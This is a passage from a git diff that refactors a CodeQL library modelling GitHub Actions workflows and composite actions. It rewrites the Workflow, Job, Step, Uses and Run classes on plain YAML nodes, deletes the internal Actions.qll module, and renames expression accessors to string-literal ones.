*/ -class CompositeAction extends AstNode instanceof Actions::CompositeAction { - Runs getRuns() { result = super.getRuns() } +class CompositeAction extends AstNode instanceof YamlDocument, YamlMapping { + //class CompositeAction extends AstNode, YamlDocument, YamlMapping { + CompositeAction() { + this.getFile().getBaseName() = ["action.yml", "action.yaml"] and + super.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" + } - Outputs getOutputs() { result = this.(YamlMapping).lookup("outputs") } + /** Gets the `runs` mapping. */ + Runs getRuns() { result = super.lookup("runs") } - Expression getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + Outputs getOutputs() { result = super.lookup("outputs") } - Expression getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } - Input getAnInput() { this.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) } + StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } + + Input getAnInput() { super.lookup("inputs").(YamlMapping).maps(result, _) } Input getInput(string name) { - this.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) and + super.lookup("inputs").(YamlMapping).maps(result, _) and result.(YamlString).getValue() = name } } -class Runs extends AstNode instanceof Actions::Runs { - Step getAStep() { result = super.getSteps().getElementNode(_) } +/** + * An `runs` mapping in a custom composite action YAML. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs + */ +class Runs extends AstNode instanceof YamlMapping { + CompositeAction action; - Step getStep(int i) { result = super.getSteps().getElementNode(i) } + Runs() { action.(YamlMapping).lookup("runs") = this } + + /** Gets the action that this `runs` mapping is in. */ + CompositeAction getAction() { result = action } + + /** Gets any steps that are defined within this job. */ + Step getAStep() { result = super.lookup("steps").(YamlSequence).getElementNode(_) } + + /** Gets the step at the given index within this job. */ + Step getStep(int i) { result = super.lookup("steps").(YamlSequence).getElementNode(i) } } /** - * A Github Actions Workflow + * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. */ -class Workflow extends AstNode instanceof Actions::Workflow { - string getName() { result = super.getName() } +class Workflow extends AstNode instanceof YamlDocument, YamlMapping { + /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ + YamlMapping getJobs() { result = super.lookup("jobs") } - Job getAJob() { result = super.getJob(_) } + /** Gets the 'global' `env` mapping in this workflow. */ + WorkflowEnv getEnv() { result = super.lookup("env") } - Job getJob(string id) { result = super.getJob(id) } + /** Gets the name of the workflow. */ + string getName() { result = super.lookup("name").(YamlString).getValue() } + + /** Gets the job within this workflow with the given job ID. */ + Job getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } + + /** Gets a job within this workflow */ + Job getAJob() { result = this.getJob(_) } predicate hasTriggerEvent(string trigger) { - exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(trigger)) + exists(YamlNode n | n = super.lookup("on").(YamlMappingLikeNode).getNode(trigger)) } string getATriggerEvent() { - exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(result)) + exists(YamlNode n | n = super.lookup("on").(YamlMappingLikeNode).getNode(result)) } - Permissions getPermissions() { result = this.(YamlMapping).lookup("permissions") } + Permissions getPermissions() { result = super.lookup("permissions") } - Strategy getStrategy() { result = this.(YamlMapping).lookup("strategy") } + Strategy getStrategy() { result = super.lookup("strategy") } } -class ReusableWorkflow extends Workflow { +class ReusableWorkflow extends Workflow instanceof YamlMapping { YamlValue workflow_call; - ReusableWorkflow() { this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } + ReusableWorkflow() { + super.lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call + } Outputs getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } - Expression getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } - Expression getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } Input getAnInput() { workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) } @@ -118,20 +182,22 @@ class Outputs extends AstNode instanceof YamlMapping { /** * Gets an output expression. */ - Expression getAnOutputExpr() { - this.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = result or - this.(YamlMapping).lookup(_) = result + StringLiteral getAnOutput() { + super.lookup(_).(YamlMapping).lookup("value") = result or + super.lookup(_) = result } /** * Gets a specific output expression by name. */ - Expression getOutputExpr(string name) { - this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result or - this.(YamlMapping).lookup(name) = result + StringLiteral getOutput(string name) { + super.lookup(name).(YamlMapping).lookup("value") = result or + super.lookup(name) = result } string getAnOutputName() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) } + + override string toString() { result = "Job outputs node" } } class Permissions extends AstNode instanceof YamlMapping { @@ -148,8 +214,8 @@ class Strategy extends AstNode instanceof YamlMapping { /** * Gets a specific matric expression (YamlMapping) by name. */ - Expression getMatrixVariableExpr(string name) { - this.(YamlMapping).lookup("matrix").(YamlMapping).lookup(name) = result + StringLiteral getMatrixVariable(string name) { + super.lookup("matrix").(YamlMapping).lookup(name) = result } string getAMatrixVariableName() { @@ -158,28 +224,61 @@ class Strategy extends AstNode instanceof YamlMapping { } /** - * A Job is a collection of steps that run in an execution environment. + * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds */ -class Job extends AstNode instanceof Actions::Job { +class Needs extends AstNode { + Job job; + + Needs() { job.(YamlMapping).lookup("needs") = this } + + Job getJob() { result = job } + + Job getANeededJob() { + if this instanceof YamlString + then + result.getId() = this.(YamlString).getValue() and + result.getLocation().getFile() = job.getLocation().getFile() + else + if this instanceof YamlSequence + then + result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and + result.getLocation().getFile() = job.getLocation().getFile() + else none() + } +} + +/** + * An Actions job within a workflow. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. + */ +class Job extends AstNode instanceof YamlMapping { + string jobId; + Workflow workflow; + + Job() { this = workflow.getJobs().lookup(jobId) } + /** * Gets the ID of this job, as a string. * This is the job's key within the `jobs` mapping. */ - string getId() { result = super.getId() } - - /** Gets the step at the given index within this job. */ - Step getStep(int index) { result = super.getStep(index) } + string getId() { result = jobId } /** Gets any steps that are defined within this job. */ - Step getAStep() { result = super.getStep(_) } + Step getAStep() { result = super.lookup("steps").(YamlSequence).getElementNode(_) } + + /** Gets the step at the given index within this job. */ + Step getStep(int i) { result = super.lookup("steps").(YamlSequence).getElementNode(i) } + + /** Gets the workflow this job belongs to. */ + Workflow getWorkflow() { result = workflow } /** * Gets a needed job. * eg: * - needs: [job1, job2] */ - Job getNeededJob() { - exists(Actions::Needs needs | + Job getANeededJob() { + exists(Needs needs | needs.getJob() = this and result = needs.getANeededJob() ) @@ -191,7 +290,11 @@ class Job extends AstNode instanceof Actions::Job { * out1: ${steps.foo.bar} * out2: ${steps.foo.baz} */ - Outputs getOutputs() { result = this.(Actions::Job).lookup("outputs") } + Outputs getOutputs() { result = super.lookup("outputs") } + + StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } + + StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } /** * Reusable workflow jobs may have Uses children @@ -201,28 +304,38 @@ class Job extends AstNode instanceof Actions::Job { * with: * arg1: value1 */ - JobUses getUses() { result.getJob() = this } + UsesJob getUses() { result.getJob() = this } predicate usesReusableWorkflow() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = "uses"), _) } - If getIf() { result = super.getIf() } + If getIf() { result = super.lookup("if") } - Permissions getPermissions() { result = this.(YamlMapping).lookup("permissions") } + Permissions getPermissions() { result = super.lookup("permissions") } - Strategy getStrategy() { result = this.(YamlMapping).lookup("strategy") } + Strategy getStrategy() { result = super.lookup("strategy") } + + override string toString() { result = "Job: " + jobId } } /** - * A Step is a single task that can be executed as part of a job. + * A step within an Actions job. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. */ -class Step extends AstNode instanceof Actions::Step { - string getId() { result = super.getId() } +class Step extends AstNode instanceof YamlMapping { + YamlMapping parent; - Job getJob() { result = super.getJob() } + Step() { parent.lookup("steps").(YamlSequence).getElementNode(_) = this } - If getIf() { result = super.getIf() } + /** Gets the ID of this step, if any. */ + string getId() { result = super.lookup("id").(YamlString).getValue() } + + /** Gets the `job` this step belongs to, if the step belongs to a `job` in a workflow. Has no result if the step belongs to `runs` in a custom composite action. */ + Job getJob() { result = parent } + + /** Gets the value of the `if` field in this step, if any. */ + If getIf() { result = super.lookup("if") } } /** @@ -232,7 +345,7 @@ class If extends AstNode { YamlMapping parent; If() { - (parent instanceof Actions::Step or parent instanceof Actions::Job) and + (parent instanceof Step or parent instanceof Job) and parent.lookup("if") = this } @@ -249,39 +362,54 @@ abstract class Uses extends AstNode { abstract string getVersion(); - abstract Expression getArgumentExpr(string key); + abstract StringLiteral getArgument(string key); + + override string toString() { result = "Uses Step" } } +/** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. + * The capture groups are: + * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` + * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. + * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. + */ +private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } + /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class StepUses extends Step, Uses { - Actions::Uses uses; +class UsesStep extends Step, Uses { + YamlScalar uses; - StepUses() { uses.getStep() = this } + UsesStep() { this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = "uses"), uses) } - override string getCallee() { result = uses.getGitHubRepository() } - - override string getVersion() { - result = uses.getVersion() - or - not exists(uses.getVersion()) and - result = "main" + /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ + override string getCallee() { + result = + ( + uses.getValue().regexpCapture(usesParser(), 1) + "/" + + uses.getValue().regexpCapture(usesParser(), 2) + ).toLowerCase() } - override Expression getArgumentExpr(string key) { - exists(Actions::With with | - with.getStep() = this and - result = with.lookup(key) - ) + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { result = uses.getValue().regexpCapture(usesParser(), 3) } + + override StringLiteral getArgument(string key) { + result = this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) + } + + override string toString() { + if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" } } /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class JobUses extends Uses instanceof YamlMapping { - JobUses() { this instanceof Job and this.maps(any(YamlString s | s.getValue() = "uses"), _) } +class UsesJob extends Uses instanceof YamlMapping { + UsesJob() { this instanceof Job and this.maps(any(YamlString s | s.getValue() = "uses"), _) } Job getJob() { result = this } @@ -297,7 +425,7 @@ class JobUses extends Uses instanceof YamlMapping { override string getCallee() { exists(YamlString name | - this.(YamlMapping).lookup("uses") = name and + super.lookup("uses") = name and if name.getValue().matches("./%") then result = name.getValue().regexpCapture(this.pathUsesParser(), 1) else @@ -311,72 +439,73 @@ class JobUses extends Uses instanceof YamlMapping { /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { exists(YamlString name | - this.(YamlMapping).lookup("uses") = name and + super.lookup("uses") = name and if not name.getValue().matches("\\.%") then result = name.getValue().regexpCapture(this.repoUsesParser(), 4) else none() ) } - override Expression getArgumentExpr(string key) { - this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result + override StringLiteral getArgument(string key) { + super.lookup("with").(YamlMapping).lookup(key) = result } } /** - * A Run step represents the evaluation of a provided script + * A `run` field within an Actions job step, which runs command-line programs using an operating system shell. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. */ class Run extends Step { - Actions::Run scriptExpr; + StringLiteral script; - Run() { scriptExpr.getStep() = this } + Run() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = "run"), script) } - Expression getScriptExpr() { result = scriptExpr } + StringLiteral getScript() { result = script } - string getScript() { result = scriptExpr.getValue() } + override string toString() { + if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" + } } -// /** -// * An AST node associated with a Reusable Workflow input. -// */ -// class InputExpr extends AstNode { -// InputExpr() { exists(Inputs inputs | inputs.(YamlMapping).maps(this, _)) } -// } -// -// /** -// * An AST node holding an Env var value. -// */ -// class EnvExpr extends AstNode { -// EnvExpr() { exists(Actions::Env env | env.(YamlMapping).lookup(_) = this) } -// } -// -// /** -// * An AST node holding a job or workflow output var. -// */ -// class OutputExpr extends AstNode { -// OutputExpr() { -// exists(Outputs outputs | -// outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or -// outputs.(YamlMapping).lookup(_) = this -// ) -// } -// } -// -// /** -// * An AST node holding a matrix var. -// */ -// class MatrixVariableExpr extends AstNode { -// MatrixVariableExpr() { -// exists(Strategy outputs | outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this) -// } -// } /** - * Evaluation of a workflow expression ${{}}. + * A YamlString part of a YamlSequence or YamlMapping values. */ -class Expression extends AstNode instanceof YamlString { +class StringLiteral extends AstNode instanceof YamlString { + StringLiteral() { + exists(YamlCollection c | + c instanceof YamlMapping and + c.(YamlMapping).maps(_, this) + or + c instanceof YamlSequence and + c.(YamlSequence).getElementNode(_) = this + ) + } + + string getValue() { result = this.(YamlString).getValue() } +} + +/** + * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. + * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. + * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} + */ +string getASimpleReferenceExpression(YamlString node) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + node.getValue() + .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, _) + .regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) +} + +/** + * A StringLiteral containing a workflow expression ${{}}. + */ +class Expression extends StringLiteral { string expr; - Expression() { expr = Actions::getASimpleReferenceExpression(this) } + Expression() { expr = getASimpleReferenceExpression(this) } string getExpression() { result = expr } @@ -384,7 +513,7 @@ class Expression extends AstNode instanceof YamlString { } /** - * A ${{}} expression accessing a context variable. + * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ class ContextExpression extends Expression { @@ -549,7 +678,7 @@ class EnvExpression extends ContextExpression { override AstNode getTarget() { exists(AstNode s | - s.getEnvExpr(fieldName) = result and + s.getEnvVar(fieldName) = result and s.getAChildNode*() = this ) } @@ -572,12 +701,12 @@ class MatrixExpression extends ContextExpression { override AstNode getTarget() { exists(Workflow w | - w.getStrategy().getMatrixVariableExpr(fieldName) = result and + w.getStrategy().getMatrixVariable(fieldName) = result and w.getAChildNode*() = this ) or exists(Job j | - j.getStrategy().getMatrixVariableExpr(fieldName) = result and + j.getStrategy().getMatrixVariable(fieldName) = result and j.getAChildNode*() = this ) } diff --git a/ql/lib/codeql/actions/ast/internal/Actions.qll b/ql/lib/codeql/actions/ast/internal/Actions.qll deleted file mode 100644 index fe10441fd67..00000000000 --- a/ql/lib/codeql/actions/ast/internal/Actions.qll +++ /dev/null @@ -1,398 +0,0 @@ -/** - * Libraries for modeling GitHub Actions workflow files written in YAML. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. - */ - -import codeql.actions.ast.internal.Yaml -import codeql.files.FileSystem - -/** - * Libraries for modeling GitHub Actions workflow files written in YAML. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. - */ -module Actions { - /** A YAML node in a GitHub Actions workflow or a custom composite action file. */ - private class Node extends YamlNode { - Node() { - exists(File f | - f = this.getLocation().getFile() and - ( - f.getRelativePath().regexpMatch("(^|.*/)\\.github/workflows/.*\\.ya?ml$") or - f.getBaseName() = ["action.yml", "action.yaml"] - ) - ) - } - } - - /** - * A custom composite action. This is a mapping at the top level of an Actions YAML action file. - * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. - */ - class CompositeAction extends Node, YamlDocument, YamlMapping { - CompositeAction() { - this.getFile().getBaseName() = ["action.yml", "action.yaml"] and - this.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" - } - - /** Gets the `runs` mapping. */ - Runs getRuns() { result = this.lookup("runs") } - } - - /** - * An `runs` mapping in a custom composite action YAML. - * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs - */ - class Runs extends StepsContainer { - CompositeAction action; - - Runs() { action.lookup("runs") = this } - - /** Gets the action that this `runs` mapping is in. */ - CompositeAction getAction() { result = action } - - /** Gets the `using` mapping. */ - Using getUsing() { result = this.lookup("using") } - } - - /** - * The parent class of the class that can contain `steps` mappings. (`Job` or `Runs` currently.) - */ - abstract class StepsContainer extends YamlNode, YamlMapping { - /** Gets the sequence of `steps` within this YAML node. */ - YamlSequence getSteps() { result = this.lookup("steps") } - } - - /** - * A `using` mapping in a custom composite action YAML. - */ - class Using extends YamlNode, YamlScalar { - Runs runs; - - Using() { runs.lookup("using") = this } - - /** Gets the `runs` mapping that this `using` mapping is in. */ - Runs getRuns() { result = runs } - } - - /** - * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. - */ - class Workflow extends Node, YamlDocument, YamlMapping { - /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ - YamlMapping getJobs() { result = this.lookup("jobs") } - - /** Gets the 'global' `env` mapping in this workflow. */ - WorkflowEnv getEnv() { result = this.lookup("env") } - - /** Gets the name of the workflow. */ - string getName() { result = this.lookup("name").(YamlString).getValue() } - - /** Gets the name of the workflow file. */ - string getFileName() { result = this.getFile().getBaseName() } - - /** Gets the `on:` in this workflow. */ - On getOn() { result = this.lookup("on") } - - /** Gets the job within this workflow with the given job ID. */ - Job getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } - } - - /** - * An Actions On trigger within a workflow. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#on. - */ - class On extends YamlNode, YamlMappingLikeNode { - Workflow workflow; - - On() { workflow.lookup("on") = this } - - /** Gets the workflow that this trigger is in. */ - Workflow getWorkflow() { result = workflow } - } - - /** A common class for `env` in workflow, job or step. */ - abstract class Env extends YamlNode, YamlMapping { } - - /** A workflow level `env` mapping. */ - class WorkflowEnv extends Env { - Workflow workflow; - - WorkflowEnv() { workflow.lookup("env") = this } - - /** Gets the workflow this field belongs to. */ - Workflow getWorkflow() { result = workflow } - } - - /** A job level `env` mapping. */ - class JobEnv extends Env { - Job job; - - JobEnv() { job.lookup("env") = this } - - /** Gets the job this field belongs to. */ - Job getJob() { result = job } - } - - /** A step level `env` mapping. */ - class StepEnv extends Env { - Step step; - - StepEnv() { step.lookup("env") = this } - - /** Gets the step this field belongs to. */ - Step getStep() { result = step } - } - - /** - * An Actions job within a workflow. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. - */ - class Job extends StepsContainer { - string jobId; - Workflow workflow; - - Job() { this = workflow.getJobs().lookup(jobId) } - - /** - * Gets the ID of this job, as a string. - * This is the job's key within the `jobs` mapping. - */ - string getId() { result = jobId } - - /** - * Gets the ID of this job, as a YAML scalar node. - * This is the job's key within the `jobs` mapping. - */ - YamlString getIdNode() { workflow.getJobs().maps(result, this) } - - /** Gets the human-readable name of this job, if any, as a string. */ - string getName() { result = this.getNameNode().getValue() } - - /** Gets the human-readable name of this job, if any, as a YAML scalar node. */ - YamlString getNameNode() { result = this.lookup("name") } - - /** Gets the step at the given index within this job. */ - Step getStep(int index) { result.getJob() = this and result.getIndex() = index } - - /** Gets the `env` mapping in this job. */ - JobEnv getEnv() { result = this.lookup("env") } - - /** Gets the workflow this job belongs to. */ - Workflow getWorkflow() { result = workflow } - - /** Gets the value of the `if` field in this job, if any. */ - JobIf getIf() { result.getJob() = this } - - /** Gets the value of the `runs-on` field in this job. */ - JobRunson getRunsOn() { result.getJob() = this } - } - - /** - * An `if` within a job. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idif. - */ - class JobIf extends YamlNode, YamlScalar { - Job job; - - JobIf() { job.lookup("if") = this } - - /** Gets the step this field belongs to. */ - Job getJob() { result = job } - } - - /** - * A `runs-on` within a job. - * See https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idruns-on. - */ - class JobRunson extends YamlNode, YamlScalar { - Job job; - - JobRunson() { job.lookup("runs-on") = this } - - /** Gets the step this field belongs to. */ - Job getJob() { result = job } - } - - /** - * A step within an Actions job. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. - */ - class Step extends YamlNode, YamlMapping { - int index; - StepsContainer parent; - - Step() { this = parent.getSteps().getElement(index) } - - /** Gets the 0-based position of this step within the sequence of `steps`. */ - int getIndex() { result = index } - - /** Gets the `job` this step belongs to, if the step belongs to a `job` in a workflow. Has no result if the step belongs to `runs` in a custom composite action. */ - Job getJob() { result = parent } - - /** Gets the `runs` this step belongs to, if the step belongs to a `runs` in a custom composite action. Has no result if the step belongs to a `job` in a workflow. */ - Runs getRuns() { result = parent } - - /** Gets the value of the `uses` field in this step, if any. */ - Uses getUses() { result.getStep() = this } - - /** Gets the value of the `run` field in this step, if any. */ - Run getRun() { result.getStep() = this } - - /** Gets the value of the `if` field in this step, if any. */ - StepIf getIf() { result.getStep() = this } - - /** Gets the value of the `env` field in this step, if any. */ - StepEnv getEnv() { result = this.lookup("env") } - - /** Gets the ID of this step, if any. */ - string getId() { result = this.lookup("id").(YamlString).getValue() } - } - - /** - * An `if` within a step. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsif. - */ - class StepIf extends YamlNode, YamlScalar { - Step step; - - StepIf() { step.lookup("if") = this } - - /** Gets the step this field belongs to. */ - Step getStep() { result = step } - } - - /** - * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. - * The capture groups are: - * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` - * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. - * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. - */ - private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } - - /** - * A `uses` field within an Actions job step, which references an action as a reusable unit of code. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsuses. - * - * For example: - * ``` - * uses: actions/checkout@v2 - * ``` - * - * Does not handle local repository references, e.g. `.github/actions/action-name`. - */ - class Uses extends YamlNode, YamlScalar { - Step step; - - Uses() { step.lookup("uses") = this } - - /** Gets the step this field belongs to. */ - Step getStep() { result = step } - - /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ - string getGitHubRepository() { - result = - ( - this.getValue().regexpCapture(usesParser(), 1) + "/" + - this.getValue().regexpCapture(usesParser(), 2) - ).toLowerCase() - } - - /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ - string getVersion() { result = this.getValue().regexpCapture(usesParser(), 3) } - } - - /** - * A `with` field within an Actions job step, which references an action as a reusable unit of code. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepswith. - * - * For example: - * ``` - * with: - * arg1: 1 - * arg2: abc - * ``` - */ - class With extends YamlNode, YamlMapping { - Step step; - - With() { step.lookup("with") = this } - - /** Gets the step this field belongs to. */ - Step getStep() { result = step } - } - - /** - * A `ref:` field within an Actions `with:` specific to `actions/checkout` action. - * - * For example: - * ``` - * uses: actions/checkout@v2 - * with: - * ref: ${{ github.event.pull_request.head.sha }} - * ``` - */ - class Ref extends YamlNode, YamlString { - With with; - - Ref() { with.lookup("ref") = this } - - /** Gets the `with` field this field belongs to. */ - With getWith() { result = with } - } - - /** - * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. - * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. - * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. - * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} - */ - string getASimpleReferenceExpression(YamlString node) { - // We use `regexpFind` to obtain *all* matches of `${{...}}`, - // not just the last (greedy match) or first (reluctant match). - result = - node.getValue() - .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, _) - .regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) - } - - /** Extracts the 'name' part from env.name */ - bindingset[name] - string getEnvName(string name) { result = name.regexpCapture("env\\.([A-Za-z0-9_]+)", 1) } - - /** - * A `run` field within an Actions job step, which runs command-line programs using an operating system shell. - * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. - */ - class Run extends YamlNode, YamlString { - Step step; - - Run() { step.lookup("run") = this } - - /** Gets the step that executes this `run` command. */ - Step getStep() { result = step } - } - - /** - * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds - */ - class Needs extends YamlNode { - Job job; - - Needs() { job.lookup("needs") = this } - - Job getJob() { result = job } - - Job getANeededJob() { - if this instanceof YamlString - then result.getId() = this.(YamlString).getValue() and result.getFile() = job.getFile() - else - if this instanceof YamlSequence - then - result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and - result.getFile() = job.getFile() - else none() - } - } -} diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 661544dfed2..d64c91f7bb7 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -77,7 +77,6 @@ module Completion { class ReturnSuccessor extends SuccessorType, TReturnSuccessor { override string toString() { result = "return" } } - // Why is there no conditional successor type? } module CfgScope { @@ -149,7 +148,7 @@ private class CompositeActionTree extends StandardPreOrderTree instanceof Compos rank[i](AstNode child, Location l | ( child = this.(CompositeAction).getAnInput() or - child = this.(CompositeAction).getAnOutputExpr() or + child = this.(CompositeAction).getAnOutput() or child = this.(CompositeAction).getRuns() ) and l = child.getLocation() @@ -172,10 +171,10 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { result = rank[i](AstNode child, Location l | ( - child = this.(ReusableWorkflow).getAJob() or child = this.(ReusableWorkflow).getAnInput() or - child = this.(ReusableWorkflow).getAnOutputExpr() or - child = this.(ReusableWorkflow).getStrategy() + child = this.(ReusableWorkflow).getAnOutput() or + child = this.(ReusableWorkflow).getStrategy() or + child = this.(ReusableWorkflow).getAJob() ) and l = child.getLocation() | @@ -203,7 +202,7 @@ private class OutputsTree extends StandardPreOrderTree instanceof Outputs { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getOutputExpr(_) and l = child.getLocation() + child = super.getOutput(_) and l = child.getLocation() | child order by @@ -216,7 +215,7 @@ private class StrategyTree extends StandardPreOrderTree instanceof Strategy { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getMatrixVariableExpr(_) and l = child.getLocation() + child = super.getMatrixVariable(_) and l = child.getLocation() | child order by @@ -248,7 +247,7 @@ private class UsesTree extends StandardPreOrderTree instanceof Uses { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getArgumentExpr(_) or child = super.getEnvExpr(_)) and + (child = super.getArgument(_) or child = super.getEnvVar(_)) and l = child.getLocation() | child @@ -262,7 +261,7 @@ private class RunTree extends StandardPreOrderTree instanceof Run { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getEnvExpr(_) or child = super.getScriptExpr()) and + (child = super.getEnvVar(_) or child = super.getScript()) and l = child.getLocation() | child @@ -276,11 +275,4 @@ private class UsesLeaf extends LeafTree instanceof Uses { } private class InputTree extends LeafTree instanceof Input { } -// private class OutputExprTree extends LeafTree instanceof OutputExpr { } -// -// private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } -// -// private class EnvExprTree extends LeafTree instanceof EnvExpr { } -private class ExprAccessTree extends LeafTree instanceof ContextExpression { } - -private class AstNodeLeaf extends LeafTree instanceof Expression { } +private class StringLiteralLeaf extends LeafTree instanceof StringLiteral { } diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 479078fe18b..c427f8b828a 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -52,7 +52,7 @@ predicate externallyDefinedSource( ) and ( if 